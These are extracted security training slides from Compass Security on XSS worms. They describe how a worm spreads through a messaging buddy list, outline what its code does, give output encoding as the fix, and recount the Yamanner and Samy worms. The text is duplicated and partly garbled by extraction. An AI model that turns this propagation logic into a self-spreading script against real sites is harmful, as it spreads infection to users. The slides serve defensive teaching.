Propagation
Step 1: initial Message
“ A sends infected Message to B
Step 2: Javascript is Executed
“ Javascript is executed on B“ The script looks for all buddies from B and looks for itself in the
HTML document.
© Compass Security AG
HTML document.
Step 3: Javascript is sent to buddies from B
“ All Buddies from B (including A) get the infected message
Step 4: Javascript is executed
“ Javascript is executed on A,C,D“ The script looks for all buddies and sends itself to these
Step 5:....
A sends infected Message to B
Step 2: Javascript is Executed
Javascript is executed on BThe script looks for all buddies from B and looks for itself in the
Slide 80www.csnc.ch
Step 3: Javascript is sent to buddies from B
All Buddies from B (including A) get the infected message
Step 4: Javascript is executed
Javascript is executed on A,C,DThe script looks for all buddies and sends itself to these
Analyzing the Worm Code
© Compass Security AG
Analyzing the Worm Code
Payload, this would be the malware. Just a simple „infected by“ alert box
Get Script from window and close window.After closing window, return the script
Slide 81www.csnc.ch
Gets all buddies (gBuddyList) and sends the result from getScriptSelfAndClose to every buddy
First step: propagationsecond step: infection
Solution
This problem is the same, like in known XSS
Always perform Output Encoding.
“ < à <
“ > à >
“ & à &
“ ...
© Compass Security AG
“ ...
As a second priority perform Input Filtering of dangerous characters such as: <, >, ", ', &, %
This problem is the same, like in known XSS-vulnerable applications
Always perform Output Encoding.
Slide 82www.csnc.ch
As a second priority perform Input Filtering of dangerous <, >, ", ', &, %
Other popular XSS Worms
Yamanner Worm (June 2006)
“ Yahoo Webmail infected.
“ Read out users contacts and sent itself to these
“ Sent all contacts to the author of the worm
Samy Worm (October 2005)
“ Also called the myspace worm
© Compass Security AG
“ Also called the myspace worm
“ Added the words „Samy is my hero“ to the victims profile
“ Spread by viewing profile of a victim. If a user viewed the profile of a victim, he became also a victim
Other popular XSS Worms
Yamanner Worm (June 2006)
Yahoo Webmail infected.
Read out users contacts and sent itself to these
Sent all contacts to the author of the worm
Also called the myspace worm
Slide 83www.csnc.ch
Also called the myspace worm
Added the words „Samy is my hero“ to the victims profile
Spread by viewing profile of a victim. If a user viewed the profile of a victim, he became also a victim
Samy Worm
In October 2005 the samy worm took down myspace.com
Myspace is not an AJAX application
The Samy Worm parsed the data it needed from the websites.
Approximately 1‘000‘000 myspace users were infected in 20
© Compass Security AG
Approximately 1‘000‘000 myspace users were infected in 20 hours
„But most of all, samy is my hero“ was written on every infected profile
In October 2005 the samy worm took down myspace.com
Myspace is not an AJAX application
The Samy Worm parsed the data it needed from the websites.
Approximately 1‘000‘000 myspace users were infected in 20
Slide 84www.csnc.ch
Approximately 1‘000‘000 myspace users were infected in 20
Samy Worm
The worm performed 5 steps for every user
“ Fetch victims profile
“ Update victims profile
“ Confirm profile update
“ Invite samy as a friend
“ Confirm samy invitation
© Compass Security AG
Confirm samy invitation
Problem was solved by output encoding
There are still infected profiles with the words „but most of all, sammy is my hero“ and the encoded javascript code on it.
“ Google: „but most of all, samy is my hero“ site:myspace.com
The worm performed 5 steps for every user
Confirm profile update
Confirm samy invitation
Slide 85www.csnc.ch
Confirm samy invitation
Problem was solved by output encoding
There are still infected profiles with the words „but most of all, sammy is my hero“ and the encoded javascript code on it.
Google: „but most of all, samy is my hero“ site:myspace.com
Compass Security AG
Compass Security Network Computing
Postfach 1628
Glärnischstrasse 7
CH - 8640 Rapperswil
[email protected] | www.csnc.ch | +41 55 214 41 60
Secure File Exchange: www.csnc.ch/filebox
PGP-Fingerprint:
© Compass Security AG
[email protected] | www.csnc.ch | +41 55 214 41 60
Slide 86www.csnc.ch